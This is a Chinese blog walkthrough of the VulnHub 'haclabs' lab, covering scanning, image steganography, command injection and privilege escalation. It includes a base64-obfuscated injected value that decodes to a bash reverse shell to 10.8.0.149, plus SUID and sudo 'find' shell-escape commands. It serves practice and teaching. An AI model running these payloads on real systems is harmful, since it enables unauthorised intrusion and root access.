【打靶练习】vulnhub: haclabs

提示

图片隐写
命令执行绕过

端口扫描&服务探测&漏洞探测

nmap -p- 172.16.33.49

在这里插入图片描述

nmap -p80 -sV 172.16.33.49

在这里插入图片描述

这个版本的apache是有目录穿越和RCE漏洞的,但是没有成功

nmap -p80 --script=vuln 172.16.33.49

没什么有用的信息

目录扫描

dirsearch -u http://172.16.33.49/

在这里插入图片描述

访问默认页面
在这里插入图片描述

尝试了一下,这个页面没什么用,标题也明示了这是个假的Admin Area

1. 敏感信息收集

admin目录
在这里插入图片描述

admin目录页面放了三张图片,照例看下页面源码
在这里插入图片描述

发现passphrase:harder,图片隐写解密的时候会提示输入passphrase,所以尝试进行图片隐写的信息提取

2. 图片隐写

将三张图片都下载到本地,使用steghide依次尝试提取

steghide extract -sf haclabs.jpeg

在这里插入图片描述

提取出一个文件,读取一下发现superadmin.php
在这里插入图片描述

边界突破

superadmin.php页面
在这里插入图片描述

这里尝试一下,会对输入的IP进行ping,可能存在命令执行

1. 命令执行

这里经过尝试可以通过拼接进行命令执行
在这里插入图片描述

但是没法执行ls命令,猜测可能存在黑白名单过滤,需要多找个payload进行尝试

2. 反弹shell

经过多轮尝试,找到可以执行的命令

127.0.0.1 | echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjguMC4xNDkvNDQ0NSA8JjEK | base64 -d | bash

在这里插入图片描述

使用python升级shell(获取完整shell),经常用到的命令,需要的自行查询吧。

提权

1. suid提权

在这里插入图片描述

可以通过find命令提权

find . -exec /bin/sh -p \; -quit

在这里插入图片描述

2. sudo提权

在这里插入图片描述

yash用户家目录,发现flag1.txt文件,通过查看内容,获得提示

在这里插入图片描述

通过全局搜索,查找到隐藏文件

在这里插入图片描述

查看隐藏文件,获得haclabs用户密码:haclabs1234

在这里插入图片描述

查看flag2.txt文件内容,没有提示了
但是可以通过sudo find进行提权

sudo find . -exec /bin/sh \; -quit

在这里插入图片描述

  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值